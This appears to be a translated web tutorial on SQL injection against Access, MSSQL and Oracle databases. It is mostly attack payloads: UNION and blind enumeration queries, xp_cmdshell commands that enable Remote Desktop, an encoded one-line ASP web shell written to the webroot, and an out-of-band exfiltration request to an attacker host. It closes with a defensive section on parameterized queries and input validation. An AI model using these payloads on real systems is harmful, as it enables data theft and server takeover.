SQL injection Detailed

Source: Internet
Author: User

1: What is SQL injection

SQL injection is an attack in which SQL code is inserted into or appended to the input parameters of an application, after which those parameters are passed to the back-end SQL server for parsing and execution.

Www.xx.com/news.php?id=1
Www.xx.com/news.php?id=1 and 1=1

Here, let's take a look at SQL injection.

First of all, SQL injection has perennially ranked first in the OWASP Top 10.

What is the process of SQL injection? (See the diagram in the original; it is not reproduced here.)

What are the dangers of SQL injection?

Database information disclosure
Web page tampering
Website used to host malware (drive-by download)
Database maliciously manipulated
Server remotely controlled
Hard-drive data destroyed ....

2 Let's take a look at SQL injection methods

2.1 Canceling friendly HTTP error messages

Remote testing is generally used to determine whether SQL injection is present, so there is usually no chance to review the injected query structure by looking at the source code. This means extensive testing through inference is frequently needed.

Open Internet Explorer and choose Tools, then Internet Options.
Open the Advanced tab and find the Browsing group in the list of settings.
Uncheck the "Show friendly HTTP error messages" check box (see the screenshot in the original; it is not reproduced here).

2.2 Finding SQL Injection

The most common way to find SQL injection is to look for Web pages of the following form:
Www.chinaliancheng.com/*.asp?id=1
Www.chinaliancheng.com/*.aspx?id=1
Www.chinaliancheng.com/*.php?id=1
Www.chinaliancheng.com/*.jsp?id=1
Single quotation mark method
Submit a single quotation mark; the page returns an error.
and 1=1 / and 1=2 method
Submit and 1=1 and the page returns normally; submit and 1=2 and the page returns an error.

2.3 Confirm Injection Point

Distinguishing between numeric and string parameters
Numeric type
SELECT *from User WHERE id=1
SELECT * from user WHERE ID > 1
Quoted (string) type
SELECT * FROM user WHERE name = ' Admin '
SELECT * from user WHERE date > ' 2017-5-3 '

Inline SQL injection: inline injection means that, after the SQL code is inserted into the query, the original query is still executed in full.

Terminating SQL injection: a terminating injection is one in which the attacker successfully ends the original statement when injecting SQL code and comments out the remainder of the query.

3: Identify the database

3.1: String concatenation operators

Www.xx.com/news.php?uid=admin
Www.xx.com/news.php?uid=ad ' + ' min
Www.xx.com/news.php?uid=ad ' min
www.xx.com/news.php?uid=ad| |min

3.2 Access Database Injection

Identify the database type using its built-in tables

and (select COUNT (*) from sysobjects) >=0
sysobjects is a built-in table of MSSQL databases
and (select COUNT (*) from msysobjects) >=0
msysobjects is a built-in table of Access databases

Manual guessing in Access injection

Guess table name
and exists (SELECT * from table name)
and (select COUNT (*) from table name) >=0

Guess Field name
and exists (select field name from table name)
and (select count (field name) from table name) >=0
Guess field length
and (select top 1 len (field name) from table name) >1
and (select top 1 len (field name) from table name) >2
and (select top 1 len (field name) from table name) >n

Guess field value
and (select top 1 ASC (Mid (field name, top)) from table name) >0
and (select top 1 ASC (Mid (field name, top)) from table name) >1
and (select top 1 ASC (Mid (field name, top)) from table name) >n
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >0
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >2
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >n

Guess the number of fields with ORDER BY

Order by 1
Order by 2
Order by N

UNION SELECT retrieves the field contents
Union Select 1, field name, 2,..., n from table name

3.3 MSSQL Database Injection

In an MSSQL injection attack, a basic check of the injection point is carried out first, since it determines how the subsequent attack proceeds.

Determine the injection point type
and exists (SELECT * from sysobjects)
Determine the injection point's privileges
and 1= (select Is_srvrolemember (' sysadmin '))//Determine if the system administrator
and 1= (select Is_srvrolemember (' db_owner '))//Determine if library permissions
and 1= (select Is_srvrolemember (' Public '))//To determine whether public permissions

Determine information from the returned errors
and @ @version >0//Database information
;d eclare @d INT//Judge MSSQL support multi-line statement query
and (select COUNT (1) from [sysobjects]) >=0//whether subqueries are supported
and user>0//Get the current database user name
and 1=convert (Int,db_name ()) or 1 = (select Db_name ())//Current database name
and 1= (SELECT @ @servername)//Local Service Name
and 1= (select Has_dbaccess (' master '))//Determine if there is a library Read permission

Check extended stored procedures
Check whether the xp_cmdshell extended stored procedure exists
and 1= (SELECT COUNT (*) from master.dbo.sysobjects WHERE xtype = ' X ' and name = ' xp_cmdshell ')
Check whether the xp_regread extended stored procedure exists
and 1= (SELECT COUNT (*) from master.dbo.sysobjects where name = ' Xp_regread ')

Restoring extended stored procedures
Delete xp_cmdshell
EXEC master. Sp_dropextendedproc ' xp_cmdshell '
Create xp_cmdshell
EXEC master. Sp_addextendedprocxp_cmdshell, ' Xplog70.dll '
This statement restores xp_cmdshell using the default Xplog70.dll file on the system.
If Xplog70.dll has been deleted or renamed, a custom path can be given to restore it:
EXEC master. Sp_addextendedproc ' xp_cmdshell ', ' C:\xplog70.dll '

Exploitation of extended stored procedures under SA privilege
The xp_cmdshell extended procedure executes arbitrary commands
Execute an arbitrary command
; EXEC master. xp_cmdshell ' dir C + '
Open 3389
EXEC master. xp_cmdshell ' sc config termservice start=auto '
EXEC master. xp_cmdshell ' net start TermService '
EXEC master. xp_cmdshell ' reg add
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server"/V
fdenytsconnections/t reg_dword/d 0x0/f '

Use sp_makewebtask to write a one-line web shell
EXEC sp_makewebtask
' C:\inetpub\wwwroot\c.asp ', ' select '%3c%25%65%76%61%6c%20%72%65%71%75%65%73%74%28%22%
63%68%6f%70%70%65%72%22%29%25%3e ""

Exploitation of extended stored procedures under db_owner privilege
Determine the database user's permissions
and 1= (select Is_member (' db_owner '));
Search for the Web directory
Create a temporary table
Create table temp (dir nvarchar (255), depth varchar (255), files varchar (255), ID int not nullidentity (all));
Populate it with xp_dirtree
Insert into temp (dir,depth,files) EXEC master.dbo.xp_dirtree ' C: ',
Query the contents of the table
and (select dir from temp where id=1) >0

Another way to enumerate the database
Enumerate field names and field values
Increase the value of n to obtain all the fields in the table
and (Select Col_name (object_id (' table name '), N)) =0
Get field contents
and (select top 1 field name from table name) >0
Enumerate other field values
and (select top 1 field name from table name where field name <> field value 1) >0

3.4 Oracle Database Injection

Determining an Oracle injection point
and 1=1 and 1=2
/*
--
;
and exists (SELECT * from dual)
and exists (select COUNT (*) from User_tables) >0

Gathering information from the injection point
After determining the injection point type, as in the MySQL injection above, first use ORDER BY to guess the number of fields, then use the UNION SELECT method to retrieve the information you want.
Get database version information
and 1=2 Union Select Null,null, (select banner from Sys.v_$version where rownum=1) from dual
Get the current database connection user name
and 1=2 Union Select Null,null, (select Sys_context (' USERENV ', ' Current_User ') fromdual) from dual
Get System Platform
and 1=2 Union Select Null,null, (select member from V$logfile where rownum=1) from dual
Get the server SID
and 1=2 Union Select Null,null, (select Instance_namefrom v$instance) from dual

 and 1=2 Union Select Null,null, (select owner from All_tables where rownum=1) from dual
After obtaining the first library name, use the following statement to enumerate other library names
 and 1=2 Union Select Null,null, (select owner from All_tab Le where rownum=1 and owner<> ' first library name ') from dual
Get table name
 and 1=2 Union Select Null,null, (SELECT table_name From User_tables where rownum=1) from dual
Enumerate other table names
 and 1=2 Union Select Null,null, (select table_name from use R_tables where Rownum=1 and table_name<> ' first table name ') from dual
Note: the table name should be given in uppercase, or as uppercase hexadecimal encoding.

Get field names
and 1=2 Union Select Null,null, (select column_name from user_tab_columns where table_name= ' table name ' and Rownum=1 ' from dual
Get other field names
and 1=2 Union Select Null,null, (select column_name from user_tab_columns where table_name= ' table name ' and column_name<> ' first Fields ' and rownum=1) from dual
Get field contents
and 1=2 Union select null,null, field name from table name

Determine whether the utl_http package is available
and exists (select COUNT (*) from All_objectswhere object_name= ' utl_http ')
Listen on a local port
Nc–vv–l–p 8888
utl_http out-of-band (rebound) injection
and Utl_http.request (' Http://IP: Port number/' | | (query statement)) =1

4 Injection tool introduction

5 Defending SQL injection

Using parameterized queries

PHP offers several frameworks for accessing databases: the mysqli extension for MySQL, the PEAR::MDB2 package (which replaced the popular PEAR::DB package), and the newer PHP Data Objects (PDO) framework. All of them make it easy to use parameterized statements.

Input validation

Validating the input the application receives is a powerful control (if used well).


Whitelist
Whitelist validation should cover the following points:
Data type: character, numeric, etc.
Data size: the string length is correct; the size and precision of a number are correct.
Data range: for a numeric type, whether the value lies within the range expected for that data type.
Data content: whether the data is of the expected kind, such as a mobile phone number, and whether it contains anything other than the expected value.
Blacklist
Blacklist validation is usually done with regular expressions as well.
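As an added example (not part of the original article), the news.php?id= lookup from section 1 written two ways: with the parameter concatenated into the SQL text, and with the whitelist checks above followed by a PDO prepared statement. It uses an in-memory SQLite database with constructed rows so it runs offline; the table and row values are assumptions for illustration.

```php
<?php
// Added example: vulnerable concatenation next to a validated, parameterized query.
// The news table and its rows are constructed for this demo.
function setupDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
    $db->exec("INSERT INTO news VALUES (1, 'Public notice', 1), (2, 'Unpublished draft', 0)");
    return $db;
}

// Vulnerable: the id parameter becomes part of the SQL text, so a tautology such as
// "1 or 1=1" changes the meaning of the WHERE clause and the published filter is bypassed.
function newsByIdConcat(PDO $db, string $id): array {
    $sql = "SELECT title FROM news WHERE published = 1 AND id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Whitelist validation from section 5: data type and size via the pattern, range via the
// bounds check. Anything that fails is rejected rather than "cleaned".
function validateId(string $raw): ?int {
    if (!preg_match('/^[1-9][0-9]{0,8}$/', $raw)) {      // type: digits only; size: at most 9
        return null;
    }
    $id = (int)$raw;
    return ($id >= 1 && $id <= 999999999) ? $id : null;   // range
}

// Hardened: the validated value travels as a bound parameter, never as SQL text,
// so even a value that passed validation cannot alter the query structure.
function newsByIdPrepared(PDO $db, string $raw): array {
    $id = validateId($raw);
    if ($id === null) {
        return [];
    }
    $stmt = $db->prepare('SELECT title FROM news WHERE published = 1 AND id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = setupDb();
$hostile = '1 or 1=1';
var_dump(newsByIdConcat($db, $hostile));    // both titles: the unpublished row leaks
var_dump(newsByIdPrepared($db, $hostile));  // empty array: input rejected by validateId
var_dump(newsByIdPrepared($db, '1'));       // ["Public notice"]
```

Requires the pdo_sqlite extension; with mysqli or PEAR::MDB2 the same pattern applies, only the prepare/bind calls differ.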

Encoding input and using stored procedures as a defense

In addition to validating the input the application receives, it is often necessary to encode content as it is passed between different modules or parts of the application.

It is often overlooked that information coming from the database should also be encoded, especially when the database in use has not been rigorously validated or vetted, or when the data comes from a third-party source.

Designing an application to access the database exclusively through stored procedures is a technique that can prevent or mitigate the effects of SQL injection. A stored procedure is a program stored in the database catalog. Depending on the database, many different languages and their variants can be used to write stored procedures.
